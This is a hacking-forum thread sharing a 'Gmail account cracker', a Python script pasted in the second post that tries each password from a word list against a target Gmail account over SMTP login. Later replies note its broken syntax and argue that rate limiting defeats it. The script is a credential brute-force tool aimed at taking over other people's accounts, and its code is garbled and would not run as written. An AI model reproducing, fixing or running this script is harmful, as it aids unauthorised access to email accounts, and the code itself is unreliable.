Login Register
The stories and information posted here are artistic works of fiction and falsehood. Only a fool would take anything posted here as fact.


Leak Python - gmail account cracker filter_list
Author
Message
Python - gmail account cracker #1
code:
https://www.up-4ever.com/y4v9rsznyuva

Reply

RE: Python - gmail account cracker #2
Spoiler: This is the code from the download
Code:
imports smtplib imports argparse parser = argparse.ArgumentParser() parser.add_argument("-t", "--target", help="Target") parser.add_argument("-f", "--file", help="Password File") args = parser.parse_args() stop = False if args.target and args.file:     stop = True     printf "Gmail Account Cracker"     passwordfile = open(args.file, "r")     for line in passwordfile:            print "Attempted Password: '+line            server = smtplib.SMTP('smtp.gmail.com:587')            server.starttls()            try:                server.login(args.target, line)                print '[!] Password: '+line                a = raw_input()                exit()            except smtplib.SMTPAuthenticationError:                pass if '__main__' == __name__:     if stop == False:            printf 'Error, correct syntax: python script.py -t <target> -f <passfile>'


For some reason, I feel like this wouldn't work as I feel that Google would start refusing your connections after a certain point.
That aside, oh dear god, is that really Python?
Quote:printf "Gmail Account Cracker"

Edit: I know Python3 which is why I am even asking... I've never even seen printf used in python2 that I know of.....
(This post was last modified: 01-18-2018, 08:07 PM by Synthx.)
[Image: ezgif_com_gif_maker.gif]
#yellowheartsforsarah

[+] 1 user Likes Synthx's post
Reply

RE: Python - gmail account cracker #3
i want to learn it where i can start it i dont know any thing about coding
Free Bitcoin Here :- https://freebitco.in/?r=1101634

Reply

RE: Python - gmail account cracker #4
Didn't check but it's unlikely that it would w3rk. It's python:!!
Quote:def printf(format, *values):
  print(format % values )

Reply

RE: Python - gmail account cracker #5
(02-25-2018, 08:36 PM)karansudhi Wrote: i want to learn it where i can start it i dont know any thing about coding

To remain on-topic, I suggest you create a thread.

As such, members can address all questions and concerns.
[Image: AD83g1A.png]

Reply

RE: Python - gmail account cracker #6
Google definitely checks how many requests you send to their login page. Thats why hydra attacks never work because Google sends a fake "correct" response to your attempt.

Reply

RE: Python - gmail account cracker #7
Had anyone tried using this tool? And does it actually work?

Reply

RE: Python - gmail account cracker #8
Dude you should study about rate limiting. Bruteforce tools dont work at all nowdays on top level domains like gmail or facebook. If you want to know why they dont work then study about rate limiting.

Reply







Users browsing this thread: